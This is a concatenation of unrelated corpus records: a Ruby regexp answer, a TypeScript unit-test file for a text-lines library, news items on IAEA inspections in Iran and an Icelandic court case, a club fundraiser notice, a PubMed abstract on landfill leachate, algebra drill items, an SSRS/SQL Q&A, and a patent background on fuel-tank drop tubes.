isn't as idiomatic Ruby. /(#{gender})(#{race})/ won't match number_of_african_male_senior_managers for 2 reasons: 1) the race comes before the gender in the hash key and 2) there is an underscore in the hash key that needs to be in the regexp. e.g. /(#{race})_(#{gender})/ would work, but the parentheses aren't needed so this can be simplified to /#{race}_#{gender}/
{ "pile_set_name": "StackExchange" }
import assert from "assert"; import fs from "fs"; import path from "path"; import { fromString, concat, countSpaces, Lines } from "../lib/lines"; import { EOL as eol } from "os"; function check(a: any, b: any) { assert.strictEqual( a.toString({ lineTerminator: eol, }), b.toString({ lineTerminator: eol, }), ); } describe("lines", function () { describe("line terminators", function () { const source = ["foo;", "bar;"]; const terminators = [ "\u000A", "\u000D", "\u2028", "\u2029", "\u000D\u000A", ]; terminators.forEach(function (t) { it("can handle " + escape(t) + " as line terminator", function () { const lines = fromString(source.join(t)); assert.strictEqual(lines.length, 2); assert.strictEqual(lines.getLineLength(1), 4); }); }); }); it("FromString", function () { function checkIsCached(s: any) { assert.strictEqual(fromString(s), fromString(s)); check(fromString(s), s); } checkIsCached(""); checkIsCached(","); checkIsCached(eol); checkIsCached("this"); checkIsCached(", "); checkIsCached(": "); const longer = "This is a somewhat longer string that we do not want to cache."; assert.notStrictEqual(fromString(longer), fromString(longer)); // Since Lines objects are immutable, if one is passed to fromString, // we can return it as-is without having to make a defensive copy. const longerLines = fromString(longer); assert.strictEqual(fromString(longerLines), longerLines); }); it("ToString", function ToStringTest() { const code = String(ToStringTest); const lines = fromString(code); check(lines, code); check(lines.indentTail(5).indentTail(-7).indentTail(2), code); }); function testEachPosHelper(lines: any, code: any) { check(lines, code); const chars: any[] = []; let emptyCount = 0; function iterator(pos: any) { const ch = lines.charAt(pos); if (ch === "") emptyCount += 1; chars.push(ch); } lines.eachPos(iterator, null); // The character at the position just past the end (as returned by // lastPos) should be the only empty string. assert.strictEqual(emptyCount, 1); // Function.prototype.toString uses \r\n line endings on non-*NIX // systems, so normalize those to \n characters. code = code.replace(/\r\n/g, "\n"); let joined = chars.join(""); assert.strictEqual(joined.length, code.length); assert.strictEqual(joined, code); const withoutSpaces = code.replace(/\s+/g, ""); chars.length = emptyCount = 0; lines.eachPos(iterator, null, true); // Skip spaces this time. assert.strictEqual(emptyCount, 0); joined = chars.join(""); assert.strictEqual(joined.length, withoutSpaces.length); assert.strictEqual(joined, withoutSpaces); } it("EachPos", function EachPosTest() { const code = String(EachPosTest); let lines = fromString(code); testEachPosHelper(lines, code); lines = lines.indentTail(5); testEachPosHelper(lines, lines.toString()); lines = lines.indentTail(-9); testEachPosHelper(lines, lines.toString()); lines = lines.indentTail(4); testEachPosHelper(lines, code); }); it("CharAt", function CharAtTest() { // Function.prototype.toString uses \r\n line endings on non-*NIX // systems, so normalize those to \n characters. const code = String(CharAtTest).replace(/\r\n/g, "\n"); const lines = fromString(code); function compare(pos: any) { assert.strictEqual(lines.charAt(pos), lines.bootstrapCharAt(pos)); } lines.eachPos(compare); // Try a bunch of crazy positions to verify equivalence for // out-of-bounds input positions. fromString(exports.testBasic).eachPos(compare); let original = fromString(" ab" + eol + " c"), indented = original.indentTail(4), reference = fromString(" ab" + eol + " c"); function compareIndented(pos: any) { const c = indented.charAt(pos); check(c, reference.charAt(pos)); check(c, indented.bootstrapCharAt(pos)); check(c, reference.bootstrapCharAt(pos)); } indented.eachPos(compareIndented); indented = indented.indentTail(-4); reference = original; indented.eachPos(compareIndented); }); it("Concat", function () { const strings = ["asdf", "zcxv", "qwer"], lines = fromString(strings.join(eol)), indented = lines.indentTail(4); assert.strictEqual(lines.length, 3); check(indented, strings.join(eol + " ")); assert.strictEqual(5, concat([lines, indented]).length); assert.strictEqual(5, concat([indented, lines]).length); check(concat([lines, indented]), lines.toString() + indented.toString()); check( concat([lines, indented]).indentTail(4), strings.join(eol + " ") + strings.join(eol + " "), ); check( concat([indented, lines]), strings.join(eol + " ") + lines.toString(), ); check(concat([lines, indented]), lines.concat(indented)); check(concat([indented, lines]), indented.concat(lines)); check(concat([]), fromString("")); assert.strictEqual(concat([]), fromString("")); check( fromString(" ").join([fromString("var"), fromString("foo")]), fromString("var foo"), ); check(fromString(" ").join(["var", "foo"]), fromString("var foo")); check( concat([fromString("var"), fromString(" "), fromString("foo")]), fromString("var foo"), ); check(concat(["var", " ", "foo"]), fromString("var foo")); check(concat([fromString("debugger"), ";"]), fromString("debugger;")); }); it("Empty", function () { function c(s: any) { const lines = fromString(s); check(lines, s); assert.strictEqual(lines.isEmpty(), s.length === 0); assert.ok(lines.trimLeft().isEmpty()); assert.ok(lines.trimRight().isEmpty()); assert.ok(lines.trim().isEmpty()); } c(""); c(" "); c(" "); c(" " + eol); c(eol + " "); c(" " + eol + " "); c(eol + " " + eol + " "); c(" " + eol + eol + " "); c(" " + eol + " " + eol + " "); c(" " + eol + " " + eol + eol); }); it("SingleLine", function () { const string = "asdf", line = fromString(string); check(line, string); check(line.indentTail(4), string); check(line.indentTail(-4), string); // Single-line Lines objects are completely unchanged by indentTail. assert.strictEqual(line.indentTail(10), line); // Multi-line Lines objects are altered by indentTail, but only if the // amount of the indentation is non-zero. const twice = line.concat(eol, line); assert.notStrictEqual(twice.indentTail(10), twice); assert.strictEqual(twice.indentTail(0), twice); check(line.concat(line), string + string); check(line.indentTail(4).concat(line), string + string); check(line.concat(line.indentTail(4)), string + string); check(line.indentTail(8).concat(line.indentTail(4)), string + string); line.eachPos(function (start) { line.eachPos(function (end) { check(line.slice(start, end), string.slice(start.column, end.column)); }, start); }); }); it("Slice", function SliceTest() { const code = String(SliceTest), lines = fromString(code); checkAllSlices(lines); }); function checkAllSlices(lines: any) { lines.eachPos(function (start: any) { lines.eachPos(function (end: any) { check(lines.slice(start, end), lines.bootstrapSlice(start, end)); check( lines.sliceString(start, end), lines.bootstrapSliceString(start, end), ); }, start); }); } function getSourceLocation(lines: any) { return { start: lines.firstPos(), end: lines.lastPos() }; } it("GetSourceLocation", function GetSourceLocationTest() { const code = String(GetSourceLocationTest), lines = fromString(code); function verify(indent: any) { const indented = lines.indentTail(indent), loc = getSourceLocation(indented), string = indented.toString(), strings = string.split(eol), lastLine = strings[strings.length - 1]; assert.strictEqual(loc.end.line, strings.length); assert.strictEqual(loc.end.column, lastLine.length); assert.deepEqual( loc, getSourceLocation(indented.slice(loc.start, loc.end)), ); } verify(0); verify(4); verify(-4); }); it("Trim", function () { const string = " xxx " + eol + " "; const options = { tabWidth: 4 }; fromString(string); function test(string: string) { const lines = fromString(string, options); check(lines.trimLeft(), fromString(string.replace(/^\s+/, ""), options)); check(lines.trimRight(), fromString(string.replace(/\s+$/, ""), options)); check( lines.trim(), fromString(string.replace(/^\s+|\s+$/g, ""), options), ); } test(""); test(" "); test(" xxx " + eol + " "); test(" xxx"); test("xxx "); test(eol + "x" + eol + "x" + eol + "x" + eol); test("\t" + eol + "x" + eol + "x" + eol + "x" + eol + "\t" + eol); test("xxx"); }); it("NoIndentEmptyLines", function () { const lines = fromString("a" + eol + eol + "b"), indented = lines.indent(4), tailIndented = lines.indentTail(5); check(indented, fromString(" a" + eol + eol + " b")); check(tailIndented, fromString("a" + eol + eol + " b")); check(indented.indent(-4), lines); check(tailIndented.indent(-5), lines); }); it("CountSpaces", function () { const count = countSpaces; assert.strictEqual(count(""), 0); assert.strictEqual(count(" "), 1); assert.strictEqual(count(" "), 2); assert.strictEqual(count(" "), 3); function check(s: string, tabWidth: number, result: number) { assert.strictEqual(count(s, tabWidth), result); } check("", 2, 0); check("", 3, 0); check("", 4, 0); check(" ", 2, 1); check("\t", 2, 2); check("\t\t", 2, 4); check(" \t\t", 2, 4); check(" \t \t", 2, 4); check(" \t \t", 2, 6); check(" \t \t", 2, 8); check(" \t \t", 2, 6); check(" \t \t", 2, 6); check(" ", 3, 1); check("\t", 3, 3); check("\t\t", 3, 6); check(" \t\t", 3, 6); check(" \t \t", 3, 6); check(" \t \t", 3, 6); check(" \t \t", 3, 6); check(" \t \t", 3, 9); check(" \t \t", 3, 9); check("\t\t\t ", 2, 9); check("\t\t\t ", 3, 12); check("\t\t\t ", 4, 15); check("\r", 4, 0); check("\r ", 4, 1); check(" \r ", 4, 2); check(" \r\r ", 4, 2); }); it("IndentWithTabs", function () { const tabWidth = 4; const tabOpts = { tabWidth: tabWidth, useTabs: true }; const noTabOpts = { tabWidth: tabWidth, useTabs: false }; let code = ["function f() {", "\treturn this;", "}"].join(eol); function checkUnchanged(lines: Lines, code: string) { check(lines.toString(tabOpts), code); check(lines.toString(noTabOpts), code); check(lines.indent(3).indent(-5).indent(2).toString(tabOpts), code); check(lines.indent(-3).indent(4).indent(-1).toString(noTabOpts), code); } let lines = fromString(code, tabOpts); checkUnchanged(lines, code); check( lines.indent(1).toString(tabOpts), [" function f() {", "\t return this;", " }"].join(eol), ); check( lines.indent(tabWidth).toString(tabOpts), ["\tfunction f() {", "\t\treturn this;", "\t}"].join(eol), ); check( lines.indent(1).toString(noTabOpts), [" function f() {", " return this;", " }"].join(eol), ); check( lines.indent(tabWidth).toString(noTabOpts), [" function f() {", " return this;", " }"].join(eol), ); const funkyCode = [ " function g() { \t ", " \t\t return this; ", "\t} ", ].join(eol); const funky = fromString(funkyCode, tabOpts); checkUnchanged(funky, funkyCode); check( funky.indent(1).toString(tabOpts), [" function g() { \t ", "\t\t return this; ", "\t } "].join(eol), ); check( funky.indent(2).toString(tabOpts), [" function g() { \t ", "\t\t\treturn this; ", "\t } "].join(eol), ); check( funky.indent(1).toString(noTabOpts), [" function g() { \t ", " return this; ", " } "].join( eol, ), ); check( funky.indent(2).toString(noTabOpts), [" function g() { \t ", " return this; ", " } "].join( eol, ), ); // Test that '\v' characters are ignored for the purposes of indentation, // but preserved when printing untouched lines. code = ["\vfunction f() {\v", " \v return \vthis;\v", "\v} \v "].join( eol, ); lines = fromString(code, tabOpts); checkUnchanged(lines, code); check( lines.indent(4).toString(noTabOpts), [" function f() {\v", " return \vthis;\v", " } \v "].join( eol, ), ); check( lines.indent(5).toString(tabOpts), ["\t function f() {\v", "\t\t return \vthis;\v", "\t } \v "].join(eol), ); }); it("GuessTabWidth", function GuessTabWidthTest(done) { let lines; lines = fromString( ["function identity(x) {", " return x;", "}"].join(eol), ); assert.strictEqual(lines.guessTabWidth(), 4); lines = fromString( ["function identity(x) {", " return x;", "}"].join(eol), ); assert.strictEqual(lines.guessTabWidth(), 2); assert.strictEqual(lines.indent(5).guessTabWidth(), 2); assert.strictEqual(lines.indent(-4).guessTabWidth(), 2); fs.readFile(__filename, "utf-8", function (err, source) { assert.equal(err, null); assert.strictEqual(fromString(source).guessTabWidth(), 4); fs.readFile( path.join(__dirname, "..", "package.json"), "utf-8", function (err, source) { assert.equal(err, null); assert.strictEqual(fromString(source).guessTabWidth(), 2); done(); }, ); }); }); it("ExoticWhitespace", function () { let source = ""; const spacePattern = /^\s+$/; for (let i = 0; i < 0xffff; ++i) { const ch = String.fromCharCode(i); if (spacePattern.test(ch)) { source += ch; } } source += "x"; const options = { tabWidth: 4 }; const lines = fromString(source, options); assert.strictEqual(lines.length, 5); assert.strictEqual(lines.getLineLength(1), options.tabWidth); assert.strictEqual(lines.getIndentAt(1), options.tabWidth); assert.strictEqual( lines .slice({ line: 5, column: lines.getLineLength(5) - 1, }) .toString(options), "x", ); assert.ok( spacePattern.test( lines .slice(lines.firstPos(), { line: 5, column: lines.getLineLength(5) - 1, }) .toString(options), ), ); }); });
{ "pile_set_name": "Github" }
Iran: Search for nuclear weapons was a failure, United Nations says The International Atomic Energy Agency said that Iran would not cooperate during its search for nuclear weapons in the country. Some Iranian students gather as they protest at the Imam Khomini’ airport in Tehran on January 29, 2012 during the arrival of the team of International Atomic Energy Agency (IAEA) inspectors. The IAEA team arrived on a mission to clear up what it called 'outstanding substantive issues' on Tehran's nuclear programme, the official IRNA news agency said. The UN atomic watchdog's chief inspector, the Belgian Herman Nackaerts, is leading the IAEA delegation that is scheduled to hold talks with Iranian officials from later Sunday to Tuesday, the report added. (ATTA KENARE/AFP/Getty Images) The International Atomic Energy Agency said that its search for nuclear weapons in Iran was a disappointment because Iranian officials were uncooperative. In a press release on its website, the IAEA said it was unable to access Parchin, a key facility where Western intelligence agencies think that nuclear testing occurred. IAEA officials said they couldn't come to a basic agreement with Iran about how it would conduct the investigation. “We engaged in a constructive spirit, but no agreement was reached,” IAEA director Yukiya Amano said in the press release. The United Nations agency has repeatedly confronted Iran with documents from Western intelligence agencies alleging that Iran is creating nuclear warheads, the Washington Post reported. Iran has been dismissive about the charges and claimed that the documents were forged. But while Ayatollah Ali Khamenei denied that the country has any nuclear weapons, military general Mohammad Hejazi has hinted otherwise, the Post said. And the wife of slain Iran nuclear scientist Mostafa Ahmadi-Rosha had told Fars News Agency that "Mostafa's ultimate goal was the annihilation of Israel."
{ "pile_set_name": "Pile-CC" }
HUGE THANKS TO YOU ALL ………….. October 7, 2015 The weekend bag-packing raised 959 euros for our Juvenile Club. Thanks to all those who helped on Friday and Saturday and Special thanks to Kay Kavanagh and Shiela Deacon for organizing………….. Our next outing will be Oct 17th @ 5pm with our OVER FORTY FOOTBALL FUNDRAISER…….which guarantee’s a fun evening for all the family………..
{ "pile_set_name": "Pile-CC" }
[Influences of matter variations on pollution buffer capacity of landfill leachate polluted subsurface environment]. Columns filled with fine sand were constructed to investigate influences of subsurface environment and main constituent variations caused by landfill leachate pollution on pH buffer capacity and redox buffer capacity of sediments. Experimental results indicated that the subsurface environment had significant impacts on pH and redox buffer capacity. The pH buffer capacity increased 12.4%, 10.8%, 19.8% and 11.1% in MGZ/SRZ, IRZ, NRZ and ORZ compared with background value, respectively. pH buffer and redox buffer were interaction and inter-promotion, which influenced natural attenuation processes of pollutants in subsurface directly. Content of iron oxides, organic substrate, SOC2(2-) and NH4+ -N in sediments had different impacts on pH buffer and redox buffer capacity, and the overall pollution buffer capacity of system was comprehensive results of constituents.
{ "pile_set_name": "PubMed Abstracts" }
Man Convicted Of Manslaughter Due To Negligence A 20-year old man was sentenced in the Northeast District Court to an eight month suspended sentence for striking three young girls with his car, RÚV reports. The tragic accident, which took place in Siglufjörður in November 2011, occurred when the man drove past a school bus which was stopped to let children out and he hit three girls walking behind the bus. One girl was killed almost immediately, a second was severely injured and the third escaped with minor injuries. The man was charged with manslaughter, speeding, driving recklessly and for driving under the influence of marijuana. He was convicted of manslaughter and acquitted on all other counts. In addition to the eight month suspended sentence, he has been ordered to pay 4 million ISK to the parents of the deceased girl, 600,000 ISK to the parents of the severely injured girl, and 200,000 ISK to the parents of the girl with minor injuries.
{ "pile_set_name": "Pile-CC" }
8 - 88 - 2*m**3 + 34*m. -2*m**3 + 34*m Collect the terms in -8*m**2 - 3*m**2 + 9*m**2. -2*m**2 Collect the terms in -17190 - 2*m**2 + 17190. -2*m**2 Collect the terms in -3 + 3 - 41*x + 2*x + 40*x. x Collect the terms in -298*v + 86*v - 627*v. -839*v Collect the terms in -20*q**2 - 4*q**2 + 11*q**2. -13*q**2 Collect the terms in -j - 251*j**3 + j. -251*j**3 Collect the terms in -5*d**3 + 254*d**2 - 254*d**2. -5*d**3 Collect the terms in 52 - 52 + 331*w**3. 331*w**3 Collect the terms in 1948*f + 4064*f + 2404*f. 8416*f Collect the terms in 60*x**3 - 118*x**3 - 95*x**3. -153*x**3 Collect the terms in 278 - 19*f**3 + 20*f**3 - 278. f**3 Collect the terms in -18*k**2 - 20*k**2 + 11*k**2. -27*k**2 Collect the terms in 35*m**2 - 115*m**2 + 45*m**2 + 38*m**2. 3*m**2 Collect the terms in 7*c**2 - 42*c**2 + 14*c**2 + 18*c**2. -3*c**2 Collect the terms in -2*o**2 - 11943*o + 11943*o. -2*o**2 Collect the terms in -29*m + 16*m + 13*m - 6*m**3. -6*m**3 Collect the terms in 2*u**2 - 4*u**2 - 16 + 33 - 17. -2*u**2 Collect the terms in 34*p**2 - 12*p**2 - 14*p**2. 8*p**2 Collect the terms in 4*q - 3*q - q - 33*q**2 + 35*q**2. 2*q**2 Collect the terms in 12339 - 24678 - 13*r**3 + 12339. -13*r**3 Collect the terms in -n**2 + 0*n**2 + 4*n**2. 3*n**2 Collect the terms in 171*a**2 - 344*a**2 + 170*a**2. -3*a**2 Collect the terms in -25*l**2 + 13*l**2 + 9*l**2. -3*l**2 Collect the terms in 0*x**3 + 6 - 62 - 2*x**3. -2*x**3 - 56 Collect the terms in -5*f - 2*f + 7*f - 9*f**2. -9*f**2 Collect the terms in 8*d - 69137 + 69137. 8*d Collect the terms in -6347*g**2 + 6347*g**2 + g**3. g**3 Collect the terms in -3*b**3 - 11*b + 29*b - 18*b. -3*b**3 Collect the terms in 2*s**3 - s**3 - 2*s + 3172*s**2 + 3*s. s**3 + 3172*s**2 + s Collect the terms in 74*x**2 - 45*x**2 - 43*x**2. -14*x**2 Collect the terms in 23 - 6 - 17 + 20*t**2. 20*t**2 Collect the terms in -122*n**2 + 72*n**2 + n**3 + 71*n**2. n**3 + 21*n**2 Collect the terms in -t**3 + 5910*t - 5910*t. -t**3 Collect the terms in 0*d**3 + 2*d + 4*d + 2*d**3. 2*d**3 + 6*d Collect the terms in 275*t**2 + 98*t**2 + 138*t**2. 511*t**2 Collect the terms in -3*l**2 + 2*l**2 - 11*l**2 - 4*l + 5*l. -12*l**2 + l Collect the terms in -9*y + 160 - 160. -9*y Collect the terms in -1 + 35*q**3 + 27*q**2 + 29*q**2 - 56*q**2. 35*q**3 - 1 Collect the terms in 6 - 6 + 19*c - 3*c. 16*c Collect the terms in -2*z**2 - 580*z**3 + 2*z**2. -580*z**3 Collect the terms in -367 + i**2 + 3*i**2 + 738 - 371. 4*i**2 Collect the terms in -z**2 + 24*z**2 - 21*z**2. 2*z**2 Collect the terms in -70*r**3 - 67*r**3 + 127*r**3. -10*r**3 Collect the terms in 7 + 5*x**2 - 7 - 3*x**2 - 3*x**2. -x**2 Collect the terms in -3*x - 4 + 4 - 3*x**2. -3*x**2 - 3*x Collect the terms in -5006*k**2 - 5007*k**2 + 10011*k**2. -2*k**2 Collect the terms in 5*m - 5*m - 2*m. -2*m Collect the terms in 2870*o**2 + 2873*o**2 - 5754*o**2. -11*o**2 Collect the terms in 2 + 12*h - 8 + 5. 12*h - 1 Collect the terms in -10*z**2 + 4*z**2 - z**2 - z**2 - 7*z**2. -15*z**2 Collect the terms in -100002599 + 100002599 - 2*b. -2*b Collect the terms in -17*i**3 + 38*i**2 - 38*i**2. -17*i**3 Collect the terms in 1372*v**2 + 1374*v**2 - 2742*v**2. 4*v**2 Collect the terms in 2*t**3 - 2*t**3 + 45*t + t**3 - 45*t. t**3 Collect the terms in -6*g**2 + 36*g**2 + 3*g**2 - 16*g**2. 17*g**2 Collect the terms in -255*d**3 + 117*d**3 + 135*d**3. -3*d**3 Collect the terms in 2 - 6 + 51*m + 4. 51*m Collect the terms in 4 + 4*i**3 + 3*i**3 - 4. 7*i**3 Collect the terms in 39*x + 9*x + x + 31*x. 80*x Collect the terms in -7*t**3 - 6607*t + 13214*t - 6607*t. -7*t**3 Collect the terms in 7*j - 19*j - 2*j + 5*j + 2*j. -7*j Collect the terms in 6*r**3 + 252*r**2 - 2*r**3 - 252*r**2. 4*r**3 Collect the terms in -9*b + 20*b - b - 10*b - 8*b. -8*b Collect the terms in -61 - m**3 + 61 - 49*m. -m**3 - 49*m Collect the terms in 13*k**3 + 12 - 4 - 6 + 0*k**3. 13*k**3 + 2 Collect the terms in 196*i - 6 + 6 + 0. 196*i Collect the terms in -3 + 27*c**3 - 23*c**3 + 3. 4*c**3 Collect the terms in 35*c + 54*c - 26*c. 63*c Collect the terms in -5*d + 12 - 12 + 7*d. 2*d Collect the terms in -152*o**3 + 86*o**3 + 70*o**3. 4*o**3 Collect the terms in x**2 + 3*x**2 - 6*x**2. -2*x**2 Collect the terms in -410*k**2 + 410*k**2 + 22*k**3. 22*k**3 Collect the terms in -7*x**3 + 1466860 - 1466860. -7*x**3 Collect the terms in -22*k - 16*k + 74*k - 20*k - 17*k. -k Collect the terms in -43*k - 5 + 5. -43*k Collect the terms in 8*w**3 - 3*w**3 + 8*w**3. 13*w**3 Collect the terms in 20*n**2 + 23*n**2 - 67*n**2 + 25*n**2. n**2 Collect the terms in -14805 + 5*n - 5*n + n**2 + 14805. n**2 Collect the terms in 0 - 61*v + 0 + 9*v + v**3. v**3 - 52*v Collect the terms in 22 - 37 + 15 - 2*z. -2*z Collect the terms in -46721*i + 46721*i - 7*i**3. -7*i**3 Collect the terms in -f - 2*f - 7*f**2 + 5*f. -7*f**2 + 2*f Collect the terms in -4 + 2 + 6*k**2 + 2. 6*k**2 Collect the terms in y - 3*y + 46 + 25 + 72. -2*y + 143 Collect the terms in 1 + 20*b**3 + 2 - 3. 20*b**3 Collect the terms in 221 - 17*b**2 - 221. -17*b**2 Collect the terms in 27*k + 27*k + 32*k - 88*k. -2*k Collect the terms in 328 - 113 - 113 - 102 - 3*a**3. -3*a**3 Collect the terms in 9*w - 9*w + 18*w**2 + w**3. w**3 + 18*w**2 Collect the terms in 0*j**2 + 0*j**2 + 0*j**2 - 3*j**2. -3*j**2 Collect the terms in 0*y - 33*y - y - 7*y. -41*y Collect the terms in -15*k**3 + 8*k**3 + 3*k**3. -4*k**3 Collect the terms in -5*j**2 - 5*j**3 - j**3 + 5*j**2 + 0*j**2. -6*j**3 Collect the terms in 4 - 5 + 60*l + 1. 60*l Collect the terms in -c**2 + c + c + 4*c**2 + 5*c**2. 8*c**2 + 2*c Collect the terms in 419*h**3 - 422*h**3 + h**2 - 2*h**2 + 4*h**2. -3*h**3 + 3*h**2 Collect the terms in -2*f**3 - 3*f + 4*f**3 + 0*f. 2*f**3 - 3*f Collect the terms in 18*d + 14 + 7 - 21. 18*d Collect the terms in 2*f - 16 - 5*f - 2*f - 20. -5*f - 36 Collect the terms in 3*a**3 - 7135 + 7135. 3*a**3 Collect the terms in -211*d + 128*d - 135*d. -218*d Collect the terms in 34*c - 13*c - 21*c - 4*c**3. -4*c**3 Collect the terms in -21 + 11 + 14*j + 10. 14*j Collect the terms in i**2 + 150 - 286 + 136. i**2 Collect the terms in -18*q**3 - 13*q**3 + 10*q**3 - 12*q**3. -33*q**3 Collect the terms in 306 + 18*z**2 - 22*z**2 - 306. -4*z**2 Collect the terms in -144*d**2 + 68*d**2 + 70*d**2. -6*d**2 Collect the terms in -111531*f**2 + 0*f**3 + 10*f**3 + 111531*f**2. 10*f**3 Collect the terms in -2*g**2 - 33*g**2 + 0*g**2 - 11*g**2. -46*g**2 Collect the terms in -12*t**2 + 2*t + 2*t - 35*t**2 - 6*t. -47*t**2 - 2*t Collect the terms in -2*q + 3 + 4 + 0. -2*q + 7 Collect the terms in -2*k - 30*k - 38*k + 15*k + k**2. k**2 - 55*k Collect the terms in -p**2 + 0*p**2 + 25 - 2*p**2. -3*p**2 + 25 Collect the terms in -442 + 442 + 5*u**3. 5*u**3 Collect the terms in 3*w + 2*w - w + 2*w. 6*w Collect the terms in -48 - i**2 + 1405*i - 1405*i. -i**2 - 48 Collect the terms in 5*n - n + 7*n - n - 13*n. -3*n Collect the terms in -1670 + 11*s**2 + 1670. 11*s**2 Collect the terms in -90 + 90 - 192*h. -192*h Collect the terms in -733 - 4*y + 733. -4*y Collect the terms in q - 11*q + 3*q. -7*q Collect the terms in -53*c**2 + 16*c**2 - 3 + 3. -37*c**2 Collect the terms in -32*m + 32*m - 7*m**3. -7*m**3 Collect the terms in z + 0*z - 2 + 5. z + 3 Collect the terms in -23*n**3 - 13*n**3 - 13*n**3. -49*n**3 Collect the terms in 10*a - 16*a + 8*a + 9. 2*a + 9 Collect the terms in -170*r + 75*r + 70*r. -25*r Collect the terms in -9 + 8*z**2 + 9. 8*z**2 Collect the terms in -2*i**2 + 1848 + 1848 - 3696. -2*i**2 Collect the terms in -34*d + 2 - 2 + 16*d + 20*d. 2*d Collect the terms in 29*x**3 + 40*x**3 - 10*x**3. 59*x**3 Collect the terms in 91*i**2 - 45*i**2 - 43*i**2. 3*i**2 Collect the terms in 290*t + 285*t + 288*t - 862*t. t Collect the terms in -19*z - 20*z - 13*z + 55*z. 3*z Collect the terms in -39*y + 67*y - 7*y**2 - 38*y. -7*y**2 - 10*y Collect the terms in 3*n**2 - 11*n**2 - 30 + 30. -8*n**2 Collect the terms in -1603 + 1603 - 2*r**2. -2*r**2 Collect the terms in -6*b**3 + b**3 - 2*b**2 + 2*b**2. -5*b**3 Collect the terms in -2*f - 49*f**3 + 2*f. -49*f**3 Collect the terms in 816*o**3 - 408*o**3 - 410*o**3. -2*o**3 Collect the terms in 760*u**2 - 760*u**2 + 2*u**3. 2*u**3 Collect the terms in 21*r**2 - 168*r**2 - 143*r**2 - 35*r**2. -
{ "pile_set_name": "DM Mathematics" }
Q: SSRS Conditional Text Color Based On Other Group's Value To simplify my need: I am comparing a projected sales number to the budgeted sales number and need to color the Projected amounts as red, black, or green, based on whether they are less, equal, or greater than the corresponding Plan amounts. Essentially my data boils down to ║ Group ║ Amount ║ Type ║ ╠═══════╬════════╬═══════════╣ ║ 1 ║ .95 ║ Projected ║ ║ 2 ║ 0 ║ Projected ║ ║ 3 ║ .04 ║ Projected ║ ║ 1 ║ 1.3 ║ Plan ║ ║ 2 ║ 0 ║ Plan ║ ║ 3 ║ .03 ║ Plan ║ My tablix is using a column grouping based on the Type. I tried the following Expression, but it's giving me Green when it should be Red. =iif(SUM(Fields!Amount.Value)<SUM(iif(Fields!Type.Value = "Plan",Fields!Amount.Value,0),"Type"),"Red",iif(SUM(Fields!Amount.Value)>SUM(iif(Fields!Type.Value = "Plan",Fields!Amount.Value,0),"Type"),"Green","Black")) My desired output is the following: A: I think it would be easier if you change your query to retrieve the data in a different way. However I'll expose a SSRS and a T-SQL solution: SSRS Solution: Add a calculated field to your dataset and concatenate the Group and Type. =Fields!GroupID.Value & "-" & Fields!AmountType.Value I am using the data you put in your question in order to recreate your scenario. Supposing you are using a matrix to get the desired output just use this data arrangement: Now in Amount cell font color property use the following expression: =IIF( Fields!AmountType.Value="Projected", IIF( Fields!Amount.Value > Lookup(Fields!Group.Value & "-" & "Plan",Fields!GroupType.Value,Fields!Amount.Value,"DataSet3"), "Green", IIF( Fields!Amount.Value < Lookup(Fields!Group.Value & "-" & "Plan",Fields!GroupType.Value,Fields!Amount.Value,"DataSet3"), "Red","Black" ) ),"Black" ) You have to change Fields!GroupType.Value according to the name you set for the calculated field. It will preview the following matrix: This solution will only work if you compare only two different types: Projected and Plan T-SQL Solution (recommended): Change your dataset query to get the data in a proper way to compare it. Based on the table you posted I've used this query. SELECT a.GroupID, a.Amount [Projected], pl.Amount [Plan] FROM your_table a INNER JOIN (SELECT * FROM your_table WHERE AmountType = 'Plan') pl ON a.GroupID = pl.GroupID WHERE a.AmountType = 'Projected' It produces: Try yourself by this fiddle: With the T-SQL solution the comparation between plan amount and projected amount is trivial in SSRS. Let me know if this helps you.
{ "pile_set_name": "StackExchange" }
1. Technical Field The present disclosure relates to drop tube segments and, more particularly, to drop tube segments providing selective access to a fluid reservoir. 2. Description of the Related Art Underground storage tanks are routinely utilized to store fuels such as gasoline, diesel fuel, ethanol, etc. for later dispensing to vehicles through fuel dispensers. The underground storage tank contains an inlet through which fuel is provided to the underground storage tank, typically by a tanker truck. A plurality of fuel dispensers are also fluidly connected to the underground storage tank and are utilized to provide the fuel contained therein to, e.g., passenger vehicles. Typically, a riser pipe extends upwardly from the underground storage tank to a fill connection point contained within a sump at the fueling station. Within the riser pipe, a drop tube extends downwardly into the volume of the underground storage tank. The drop tube extends toward the bottom of the underground storage tank so that the outlet end of the drop tube is covered by the motor fuel or other liquid contained in the underground storage tank. Therefore, the drop tube is not in fluid communication with the fuel vapor contained in the ullage area of the underground storage tank. However, the overfill prevention valve is typically positioned much closer to the top of the underground storage tank and is therefore typically in fluid communication with the vapor contained in the ullage area of the underground storage tank. When filling an underground storage tank, the operator of a tanker truck must be careful not to overfill the underground storage tank. To this end, an overfill prevention valve may be utilized to prevent overfilling of the underground storage tank. For example, an overfill prevention valve may utilize a float which is buoyant on a surface of a quantity of motor fuel and which is connected by a linkage to a valve positioned within a segment of a drop tube connecting a fill point to the underground storage tank. The linkage extends through the wall of the drop tube so that it can mechanically connect the float, which is outside of the drop tube, to the valve body, which is inside the drop tube. When the float rises to a “filled” position as the fuel level approaches the top the tank, the linkage causes the valve to close. When closed, incoming fuel quickly builds up above the valve in the drop tube, causing the operator to stop the flow of fuel. Because the overfill prevention valves of prior art devices include a mechanical linkage connecting a float positioned on the exterior of the drop tube with a valve body positioned on the interior of the drop tube, the wall of the drop tube segment containing the overfill prevention valve must be physically penetrated by the linkage to allow for such a connection. This physical penetration of the wall of the drop tube segment containing the overfill prevention valve creates a leak point where vapor contained in the ullage space of the underground storage tank can enter into the drop tube. It is desirable to prevent vapor contained in the ullage space of the underground storage tank from entering into the interior of the drop tube where it could potentially be vented to the atmosphere. In order to verify that the overfill prevention valve is working properly, it may be desirable to include a testing functionality whereby the valve can be actuated selectively, without the need for an actual overfill condition.
{ "pile_set_name": "USPTO Backgrounds" }
